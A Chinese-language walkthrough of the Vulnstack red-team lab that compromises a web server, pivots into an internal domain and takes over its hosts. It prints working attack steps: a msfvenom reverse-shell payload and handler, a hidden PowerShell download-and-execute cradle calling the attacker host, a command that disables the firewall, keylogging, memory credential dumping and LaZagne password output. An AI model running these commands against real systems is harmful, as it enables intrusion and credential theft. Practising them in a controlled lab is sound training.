lainwith
lainwith

ATT&cK实战系列—红队实战(一)【全记录】

  • 环境准备
    • 搭建环境
    • 配置靶机
      • 配置win2008
      • 配置win7
  • 信息收集
    • nmap信息收集
    • 目录爆破
    • 探测网站
      • 探测phpmyadmin
      • 探测beifen.rar
    • 网站后台
  • 渗透攻击
    • getshell
    • 收集系统信息
    • 上传木马
    • 反弹shell连接msf
    • win7信息收集
    • 添加路由
  • 内网渗透
    • 内网主机发现
      • msf起代理
      • 修改proxychains
      • nmap内网主机发现
  • 使用Cobalt Strike
    • 设置监听器
    • 生成Web Delivery
    • 拿下主机
      • 进入命令行
      • 当前用户权限
      • 文件管理
      • 进程管理
      • 屏幕截图
      • 桌面控制
      • 键盘记录
    • 内网信息收集
      • 端口扫描
      • 漏洞扫描
      • 域内信息收集
      • 收集账号密码
      • 直接从内存中导出系统密码
      • 使用LaZagne查找本地存储的所有密码
    • 使用域账号登录其他主机
      • 建立隧道
      • target
    • 战果拓扑图

环境准备

1:下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
2:环境介绍:

共有三台机器,win7是对外的web机,win2003和win2008是内网机器

3:网络拓扑
ATT&cK实战系列—红队实战(一)【全记录】_第1张图片

搭建环境

1:三台机器都连接到vm1网卡
2:关闭vmware在vm1网卡上的DHCP功能
3:给win7添加一个网卡(win2003和win2008只有一块网卡),采用NAT
4:kali使用NAT
5:给以上机器拍摄快照
6:三台靶机全部开机

配置靶机

下面的配置操作建议做一下,不然实验的时候会很闹心。

三台靶机的默认密码是 hongrisec@2019

配置win2008

1:重设密码
登录win2008会被提示密码已经过期,需要重设密码,重设一个即可。注意,你是给liukaifeng01改了密码
ATT&cK实战系列—红队实战(一)【全记录】_第2张图片
2:不要手贱
开机之后会看到一个提示,要你重启计算机,不要答应它,选择稍后重启,然后就可以不用管它了
3:推荐设置管理员账号永不过期
ATT&cK实战系列—红队实战(一)【全记录】_第3张图片
ATT&cK实战系列—红队实战(一)【全记录】_第4张图片

配置win7

1:关于移除设备
有的人会习惯移除“打印机”、“声卡”、“CD/DVD(IDE)”诸类的设备,但是不要在win7上这样做,尤其是不能移除“打印机”,否则phpstudy会启动失败
2:不要手贱
开机之后会看到一个提示,要你重启计算机,不要答应它,选择稍后重启,然后就可以不用管它了
3:开启phpstudy
在文件目录:C:\phpStudyphpStudy.exe
4:检查一下ip
也许你的IP正常,但是我的机器出错了,在一块网卡使用VM1,一块网卡使用NAT的情况下,无法获取到NAT的地址。但是其他机器能正常获取NAT地址,方案可以参考vmware网卡排雷
此处解决办法如下,使用三块网卡,NAT能够正常使用了,但是桥接的网卡是192.254.124.253,不能用,正好符合实验环境:
ATT&cK实战系列—红队实战(一)【全记录】_第5张图片
5:确认web服务开启
输入win7对外IP可以看到phpStudy探针,说明正常。如果网络配置正常还无法正常访问,请试试设置防火墙规则,然后重启phpStudy
ATT&cK实战系列—红队实战(一)【全记录】_第6张图片

信息收集

nmap信息收集

看到目标开启了80、3306端口,那就先看看网站
ATT&cK实战系列—红队实战(一)【全记录】_第7张图片

登录网站,首先看到如下页面
ATT&cK实战系列—红队实战(一)【全记录】_第8张图片
存在如下问题:

http明文传输
服务器指纹泄露(系统、Apache、PHP版本)
phpinfo信息泄露
mysql数据库弱口令
mysql数据库口令爆破
phpstudy后门(待检测)

目录爆破

御剑走一波
ATT&cK实战系列—红队实战(一)【全记录】_第9张图片

探测网站

依次访问御剑爆出的一些目录:

探测phpmyadmin

使用弱密码root成功登录phpmyadmin,看到了一个名为newyxcms的表,(cms:内容管理系统)
ATT&cK实战系列—红队实战(一)【全记录】_第10张图片
存在如下问题:

外网可以访问phpmyadmin(默认情况下只能localhost访问)

基本可以确认网站使用的是yxcms,试试能不能访问,在“公告信息”中知道网站后台账密是admin:123456,地址是/index.php?r=admin

探测beifen.rar

ATT&cK实战系列—红队实战(一)【全记录】_第11张图片
ATT&cK实战系列—红队实战(一)【全记录】_第12张图片

ATT&cK实战系列—红队实战(一)【全记录】_第13张图片
确定了网站的版本是1.2.1,可以考虑找一找这个版本的漏洞,但是已经在“公告信息”里面看到了后台登录账密,就不费那心思了

网站后台

ATT&cK实战系列—红队实战(一)【全记录】_第14张图片
在“前台模板” 中看见自己可以编辑模板,模板通常可以自定义php文件,而如果可以自定义php文件直接就可以上一句话木马了
ATT&cK实战系列—红队实战(一)【全记录】_第15张图片
ATT&cK实战系列—红队实战(一)【全记录】_第16张图片

渗透攻击

getshell

1:写入一句话木马

ATT&cK实战系列—红队实战(一)【全记录】_第17张图片
2:找到info.php所在路径

protected/apps/default/view

ATT&cK实战系列—红队实战(一)【全记录】_第18张图片
ATT&cK实战系列—红队实战(一)【全记录】_第19张图片
ATT&cK实战系列—红队实战(一)【全记录】_第20张图片
3:蚁剑连接

http://192.168.40.128/yxcms/protected/apps/default/view/default/info.php

编码设置使用默认的UTF8,有的内容会出现乱码,这里使用GBK编码
ATT&cK实战系列—红队实战(一)【全记录】_第21张图片

收集系统信息

ATT&cK实战系列—红队实战(一)【全记录】_第22张图片
ATT&cK实战系列—红队实战(一)【全记录】_第23张图片

ATT&cK实战系列—红队实战(一)【全记录】_第24张图片

关闭防火墙:netsh advfirewall set allprofiles state off

上传木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.3.139.50 lport=4444 -f exe -o re.exe

ATT&cK实战系列—红队实战(一)【全记录】_第25张图片

反弹shell连接msf

1:msf监听

use exploit/multi/handler
show options
set payload windows/meterpreter/reverse_tcp
set lhost 10.3.139.50
run

2:启动木马
ATT&cK实战系列—红队实战(一)【全记录】_第26张图片
ATT&cK实战系列—红队实战(一)【全记录】_第27张图片

win7信息收集

当前达到的meterpreter来自win7

1:收集补丁信息

run post/windows/gather/enum_patches

ATT&cK实战系列—红队实战(一)【全记录】_第28张图片

2:安装的软件信息,发现有nmap,可以直接利用nmap对内网52网段进行扫描

run post/windows/gather/enum_applications

添加路由

添加路由:run autoroute -s 192.168.52.0 255.255.255.0
查看路由:run autoroute -p

ATT&cK实战系列—红队实战(一)【全记录】_第29张图片

内网渗透

内网主机发现

使用arp扫描,发现内网中共有三台主机

run post/windows/gather/arp_scanner rhosts=192.168.52.0/24

ATT&cK实战系列—红队实战(一)【全记录】_第30张图片

msf起代理

meterpreter > background  隐藏到后台
use auxiliary/server/socks5
show options
run

修改proxychains

sudo vim /etc/proxychains.conf

ATT&cK实战系列—红队实战(一)【全记录】_第31张图片

nmap内网主机发现

nmap扫描凉凉
ATT&cK实战系列—红队实战(一)【全记录】_第32张图片

不怕,还记得在msf收集信息的时候发现win7有nmap吗?使用蚁剑来做个扫描。

由于依然无法只用nmap做全面的主机发现,所以使用msf主机发现的结果来做扫描
ATT&cK实战系列—红队实战(一)【全记录】_第33张图片
ATT&cK实战系列—红队实战(一)【全记录】_第34张图片
ATT&cK实战系列—红队实战(一)【全记录】_第35张图片

使用Cobalt Strike

前面做的很不顺利,改用Cobalt Strike,使用cs的前提是需要获取到shell,即:当蚁剑拿到shell时就可以使用cs了
cs服务器在kali上面启动

sudo chmod +x teamserver
sudo ./teamserver 10.3.139.50 123456 &

cs客户机在kali上面启动

sudo chmod +x start.sh
./start.sh

ATT&cK实战系列—红队实战(一)【全记录】_第36张图片
ATT&cK实战系列—红队实战(一)【全记录】_第37张图片
重启kali依然登录cs被拒,今天真是太难了::>_<::

排雷补充:
启动cs服务器的时候,不让它在后台运行,即可
(不过我用另外一台kali把cs放后台可以正常使用)

ATT&cK实战系列—红队实战(一)【全记录】_第38张图片

在这里插入图片描述

因为种种原因第一次做的不大顺利,现在第二次做,下面的4个ip无需记忆,只是为了解释部分截图IP不一致的问题,重点在于理解操作上的逻辑

kali的IP(原本)192.168.40.147----->(现在)10.3.139.50

win7的IP(原本)192.168.40.128------->(现在)10.3.139.51

设置监听器

因为win7是web服务器,所以使用HTTP来建立连接,这意味着cs不能主动联系肉鸡,只能肉鸡来主动连接cs接收命令。默认情况下肉鸡会每隔60秒来cs服务端下载命令,在服务端执行完命令之后,会把命令的执行结果以HTTP的POST方式传到服务端。

(请把下面的ip当作是10.3.139.50)

ATT&cK实战系列—红队实战(一)【全记录】_第39张图片

生成Web Delivery

生成木马,文件或者命令
ATT&cK实战系列—红队实战(一)【全记录】_第40张图片
接下来它会生成一个powershell命令,如

#powershell 是Windows 系统自带组件
#无需上传文件到目标服务器磁盘
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.40.147:80/a'))"

拿下主机

蚁剑的虚拟终端执行命令,cs拿到上线主机
ATT&cK实战系列—红队实战(一)【全记录】_第41张图片
可以看到,肉鸡每隔60秒才会来连接服务器,做实验的话太慢了,调整一下时间,需要等60秒才能生效
ATT&cK实战系列—红队实战(一)【全记录】_第42张图片
【下面三级标题的内容是给我自己看的,读者可以忽略】

进入命令行

所有的图形化操作都可以在命令行里面显示,也可以直接在命令行里面写命令
ATT&cK实战系列—红队实战(一)【全记录】_第43张图片

当前用户权限

ATT&cK实战系列—红队实战(一)【全记录】_第44张图片

文件管理

beacon|右键|Explore|File Browser

ATT&cK实战系列—红队实战(一)【全记录】_第45张图片

进程管理

beacon|右键|Explore|Process List

ATT&cK实战系列—红队实战(一)【全记录】_第46张图片

屏幕截图

截屏

beacon|右键|Explore|Screenshots

查看截屏

View|Screenshots

ATT&cK实战系列—红队实战(一)【全记录】_第47张图片
ATT&cK实战系列—红队实战(一)【全记录】_第48张图片

桌面控制

beacon> desktop

ATT&cK实战系列—红队实战(一)【全记录】_第49张图片

键盘记录

键盘记录

beacon|右键|Explore|Process List|Log Keystrokes

查看键盘记录

View Keystrokes

如果记录键盘的话还是迁移一下注入的进程比较好,不要迁移到SYSTEM的进程里面去,因为SYSTEM是机器账户,不能登录系统,也自然不能记录它的键盘
ATT&cK实战系列—红队实战(一)【全记录】_第50张图片
ATT&cK实战系列—红队实战(一)【全记录】_第51张图片

内网信息收集

端口扫描

beacon|右键|Explore|Port Scan

ATT&cK实战系列—红队实战(一)【全记录】_第52张图片
扫的啥玩意啊,只发现了我自个
ATT&cK实战系列—红队实战(一)【全记录】_第53张图片
排查网络时发现,win7与其他机器网络不通了,解除问题之后再扫一遍
ATT&cK实战系列—红队实战(一)【全记录】_第54张图片

就这?还是nmap吧!cs下nmap正常发挥
ATT&cK实战系列—红队实战(一)【全记录】_第55张图片

漏洞扫描

扫描过程有点慢,耐心点,会拿到丰厚战果(考虑到前面使用msf拿win7并不号用,这里仅作扫描,不再联动msf)

对192.168.52.141扫描

beacon> shell nmap --script=vuln 192.168.52.141
[*] Tasked beacon to run: nmap --script=vuln 192.168.52.141
[+] host called home, sent: 64 bytes
[+] received output:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-22 17:57 ?D1ú±ê×?ê±??

[+] received output:
Nmap scan report for 192.168.52.141
Host is up (0.00s latency).
Not shown: 987 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
135/tcp  open  msrpc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp  open  netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp  open  microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
777/tcp  open  multiling-http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1025/tcp open  NFS-or-IIS
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1028/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1029/tcp open  ms-lsa
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1030/tcp open  iad1
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
6002/tcp open  X11:2
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
7001/tcp open  afs3-callback
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
7002/tcp open  afs3-prserver
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
8099/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:70:62:5D (VMware)

Host script results:
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Nmap done: 1 IP address (1 host up) scanned in 125.97 seconds

对192.168.52.138扫描

beacon> shell nmap --script=vuln 192.168.52.138
[*] Tasked beacon to run: nmap --script=vuln 192.168.52.138
[+] host called home, sent: 64 bytes
[+] received output:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-22 18:02 ?D1ú±ê×?ê±??

[+] received output:
Nmap scan report for 192.168.52.138
Host is up (0.00s latency).
Not shown: 982 filtered ports
PORT      STATE SERVICE
53/tcp    open  domain
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp    open  http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
88/tcp    open  kerberos-sec
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
135/tcp   open  msrpc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp   open  netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
389/tcp   open  ldap
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
445/tcp   open  microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
464/tcp   open  kpasswd5
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
593/tcp   open  http-rpc-epmap
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
636/tcp   open  ldapssl
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
3268/tcp  open  globalcatLDAP
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
3269/tcp  open  globalcatLDAPssl
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
49154/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49155/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49157/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49158/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49161/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49167/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:AA:F7:D1 (VMware)

Host script results:
| smb-double-pulsar-backdoor: 
|   VULNERABLE:
|   Double Pulsar SMB Backdoor
|     State: VULNERABLE
|     Risk factor: HIGH  CVSSv2: 10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C)
|       The Double Pulsar SMB backdoor was detected running on the remote machine.
|       
|     Disclosure date: 2017-04-14
|     References:
|       https://isc.sans.edu/forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312/
|       https://github.com/countercept/doublepulsar-detection-script
|_      https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Nmap done: 1 IP address (1 host up) scanned in 153.58 seconds

对192.168.52.143扫描:

beacon> shell nmap --script=vuln 192.168.52.143
[*] Tasked beacon to run: nmap --script=vuln 192.168.52.143
[+] host called home, sent: 64 bytes
[+] received output:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-22 18:08 ?D1ú±ê×?ê±??

[+] received output:
Nmap scan report for www.qiyuanxuetang.net (192.168.52.143)
Host is up (0.00s latency).
Not shown: 989 closed ports
PORT     STATE SERVICE
80/tcp   open  http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=www.qiyuanxuetang.net
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://www.qiyuanxuetang.net:80/
|     Form id: 
|     Form action: /l.php#bottom
|     
|     Path: http://www.qiyuanxuetang.net:80/l.php
|     Form id: 
|_    Form action: /l.php#bottom
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /phpinfo.php: Possible information file
|   /phpmyadmin/: phpMyAdmin
|   /phpMyAdmin/: phpMyAdmin
|_  /PHPMyAdmin/: phpMyAdmin
| http-phpself-xss: 
|   VULNERABLE:
|   Unsafe use of $_SERVER["PHP_SELF"] in PHP files
|     State: VULNERABLE (Exploitable)
|       PHP files are not handling safely the variable $_SERVER["PHP_SELF"] causing Reflected Cross Site Scripting vulnerabilities.
|              
|     Extra information:
|       
|   Vulnerable files with proof of concept:
|     http://www.qiyuanxuetang.net/l.php/%27%22/%3E%3Cscript%3Ealert(1)%3C/script%3E
|   Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=www.qiyuanxuetang.net
|     References:
|       https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
|_      http://php.net/manual/en/reserved.variables.server.php
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
| http-sql-injection: 
|   Possible sqli for queries:
|     http://www.qiyuanxuetang.net:80/l.php?act=Function%27%20OR%20sqlspider
|     http://www.qiyuanxuetang.net:80/l.php?act=phpinfo%27%20OR%20sqlspider
|     http://www.qiyuanxuetang.net:80/l.php?act=Function%27%20OR%20sqlspider
|     http://www.qiyuanxuetang.net:80/l.php?act=phpinfo%27%20OR%20sqlspider
|     http://www.qiyuanxuetang.net:80/l.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000%27%20OR%20sqlspider
|     http://www.qiyuanxuetang.net:80/l.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42%27%20OR%20sqlspider
|     http://www.qiyuanxuetang.net:80/l.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42%27%20OR%20sqlspider
|   Possible sqli for forms:
|     Form at path: /, form's action: /l.php#bottom. Fields that might be vulnerable:
|       host
|       port
|       login
|       funName
|     Form at path: /l.php, form's action: /l.php#bottom. Fields that might be vulnerable:
|       host
|       port
|       login
|_      funName
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
135/tcp  open  msrpc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp  open  netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp  open  microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1025/tcp open  NFS-or-IIS
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1026/tcp open  LSA-or-nterm
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1027/tcp open  IIS
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1028/tcp open  unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1029/tcp open  ms-lsa
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1248/tcp open  hermes
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
3306/tcp open  mysql
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-double-pulsar-backdoor: 
|   VULNERABLE:
|   Double Pulsar SMB Backdoor
|     State: VULNERABLE
|     Risk factor: HIGH  CVSSv2: 10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C)
|       The Double Pulsar SMB backdoor was detected running on the remote machine.
|       
|     Disclosure date: 2017-04-14
|     References:
|       https://isc.sans.edu/forums/diary/Detecting+SMB+Covert+Channel+Double+Pulsar/22312/
|       https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation
|_      https://github.com/countercept/doublepulsar-detection-script
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 138.36 seconds

域内信息收集

啥玩意啊,辣鸡
ATT&cK实战系列—红队实战(一)【全记录】_第56张图片

收集账号密码

直接从内存中导出系统密码

beacon> logonpasswords

ATT&cK实战系列—红队实战(一)【全记录】_第57张图片

使用LaZagne查找本地存储的所有密码

LaZagne的下载地址参考:https://github.com/AlessandroZ/LaZagne/releases/

使用蚁剑将exe文件上传到目标主机上再执行,这里可能还是机器的原因,all命令不好用,但是其他命令可以正常使用

C:\phpStudy> lazagne.exe all
C:\phpStudy> lazagne.exe browsers
|====================================================================|
|                                                                    |
|                        The LaZagne Project                         |
|                                                                    |
|                          ! BANG BANG !                             |
|                                                                    |
|====================================================================|
[+] System masterkey decrypted for f22e410f-f947-4e08-8f2a-8f65df603f8d
[+] System masterkey decrypted for 1e582198-061f-43f1-abdf-d4e9b606b035
[+] System masterkey decrypted for bac7c6bc-5481-420b-b563-762266ca9865
########## User: Administrator ##########
------------------- Firefox passwords -----------------
[+] Password found !!!
URL: http://192.168.101.12:8080
Login: [email protected]
Password: 123456789
########## User: liukaifeng01 ##########
------------------- Firefox passwords -----------------
[+] Password found !!!
URL: http://192.168.101.12:8080
Login: [email protected]
Password: 123456789
[+] 2 passwords have been found.
For more information launch it again with the -v option
elapsed time = 8.12800002098

使用域账号登录其他主机

建立隧道

由于其他主机使用了VM1,所以使用SMB建立连接
ATT&cK实战系列—红队实战(一)【全记录】_第58张图片
ATT&cK实战系列—红队实战(一)【全记录】_第59张图片

target

前面已经拿到了系统密码,直接用域管理员的密码登录
ATT&cK实战系列—红队实战(一)【全记录】_第60张图片
ATT&cK实战系列—红队实战(一)【全记录】_第61张图片

相同的方法拿下内网中的机器138和141
ATT&cK实战系列—红队实战(一)【全记录】_第62张图片
ATT&cK实战系列—红队实战(一)【全记录】_第63张图片

战果拓扑图

行,就到此结束了。
ATT&cK实战系列—红队实战(一)【全记录】_第64张图片

你可能感兴趣的:(渗透测试,作业,web)

  • Vue打包后生成的文件及编程细节 心之飞翼 vue.js前端javascript编程
    Vue.js是一种流行的JavaScript框架,用于构建现代化的单页应用程序。当我们开发一个Vue应用并准备将其部署到生产环境时,我们需要对应用进行打包,以便生成最终的可执行文件。在这篇文章中,我们将详细讨论Vue打包后生成的文件,以及与之相关的编程细节。1.打包工具:Webpack在Vue项目中,常用的打包工具是Webpack。Webpack提供了强大的模块打包能力,能够将Vue应用中的各种资
  • Webpack 打包后文件过大,如何优化? 几何心凉 前端入门之旅webpack前端node.js
    聚沙成塔·每天进步一点点本文回顾⭐专栏简介Webpack打包后文件过大,如何优化?1.代码分割(CodeSplitting)1.1概念1.2Webpack的`SplitChunksPlugin`示例配置:1.3按需加载(LazyLoading)示例:2.TreeShaking2.1概念2.2启用TreeShaking示例配置:2.3检查未被使用的代码安装`webpack-bundle-analyz
  • 2025年渗透测试面试题总结-字某某动-安全研究实习生(二面)(题目+回答) 独行soc 2025年渗透测试面试指南面试职场和发展安全网络安全红蓝攻防护网
    网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。目录字某某动-安全研究实习生(二面)1.护网行动中的核心工作2.防护层级选择(WAF/IDS)3.误报治理方案4.内网误报分布场景5.MySQL执行PowerShell防护6.资产收集经验7.漏洞攻击案例8.SQL注入攻防详解原理防御方案OrderBy防御特殊字符处理9.
  • Selenium元素定位:深入探索与实践 傻啦嘿哟 python办公自动化selenium测试工具
    目录一、引言二、Selenium元素定位基础1.WebDriver与元素定位2.定位策略概览三、ID定位1.特点与优势2.示例代码四、ClassName定位1.特点与限制2.示例代码五、XPath定位1.特点与优势2.示例代码3.XPath高级用法六、CSSSelector定位1.特点与优势2.示例代码3.CSSSelector高级用法七、其他定位策略1.Name定位2.TagName定位3.Li
  • 高斯溅射融合之路(一)- webgl渲染3d gaussian splatting 山海鲸可视化 数字孪生GIS系统webgl数字孪生GIS高斯泼溅AI重构
    大家好,我是山海鲸的技术负责人。之前已经写了一个GIS融合系列。其实CesiumJS的整合有相当的难度,同时也有很多方面的工作,很难在几篇文章内写完,整个山海鲸团队也是投入了接近两年的时间,才把周边整套工具链进行了完善,后续有新的内容也会持续分享,隔壁系列传送门:GIS融合之路一坑未平,一坑又起。去年年末,我们的AI合作伙伴突然给山海鲸技术团队丢来了一个新技术-3DGaussianSplattin
  • selenium.common.exceptions.NoSuchElementException: Message: no such element: Unable to locate elemen 挽风821 软件测试selenium测试工具
    报错原因:页面还没加载完,就开始找元素了使用time.sleep()等待几秒就可以了#创建ChromeWebDriverdriver=webdriver.Chrome(service=Service('D:\ProgramFiles\python\python3.10.0\chromedriver.exe'),options=chrome_options)driver.maximize_windo
  • 解决uniapp生成自定义海报/邀请名片,保存图片到本地
    本代码片段使用插件《qs-canvas》,支持Node、web、uni-app的canvas绘图工具。效果图安装npm包npminstallqs-canvas-S代码片段//index.vue保存图片到本地import{reactive,ref,computed,onMounted,getCurrentInstance}from'vue';import{getQrCode}from'./api/i
  • 可视化学习:WebGL实现简易的局部“马赛克”
    前言接触过Canvas的小伙伴应该都知道,在Canvas2D中我们要加载一个图片很简单,通过调用drawImageAPI就能将图像绘制到画布上,当然在WebGL中我们也可以绘制图像,在绘制时我们需要用到WebGL中的纹理对象,在之前WebGL实现网格背景的文章中,我使用了一个叫做纹理坐标的配置,现在要完成纹理的加载我们也需要用到纹理坐标,并且我们可以通过对纹理坐标处理实现简单的”马赛克“效果。通过
  • 可视化学习:使用WebGL绘制圆形,实现色盘
    前言在Canvas2D中实现圆形的绘制比较简单,只要调用arc指令就能在Canvas画布上绘制出一个圆形,类似的,在SVG中我们也只需要一个标签就能在页面上绘制一个圆形。那么在WebGL中我们要怎么去绘制呢?WebGL只能绘制三种形状:点、线段和三角形,它没有提供直接绘制圆形的功能,当然也无法像SVG一样使用标签,所以我们是无法直接绘制圆形曲线的,这个时候我们可以借助相关的数学知识,来实现圆形的绘
  • B站自研的第二代视频连麦系统(上) 哔哩哔哩技术 webrtc直播
    导读本系列文章将从客户端、服务器以及音视频编码优化三个层面,介绍如何基于WebRTC构建视频连麦系统。希望通过这一系列的讲解,帮助开发者更全面地了解WebRTC的核心技术与实践应用。背景在文章《B站在实时音视频技术领域的探索与实践》中,提到了直播行业从传统娱乐直播发展到教育、电商等新形式,用户对实时互动直播的需求增加。B站基于WebRTC的开发了一套视频连麦系统:这套系统优先选择UDP协议以保证低
  • K8s - 结合实战场景的深度问题 小马不敲代码 云原生kubernetes容器云原生
    1:存活探针(LivenessProbe)、就绪探针(ReadinessProbe)、启动探针(StartupProbe)的区别及适用场景?1、存活探针(LivenessProbe)•目的:检测容器是否处于运行状态,若失败则重启容器。•适用场景:•应用程序因死锁或死循环无法响应请求时自动恢复。•例如:Web服务长时间无响应需强制重启。•配置示例livenessProbe:httpGet:path:
  • SpringMVC的国际化 小胖子许愿 Springspring
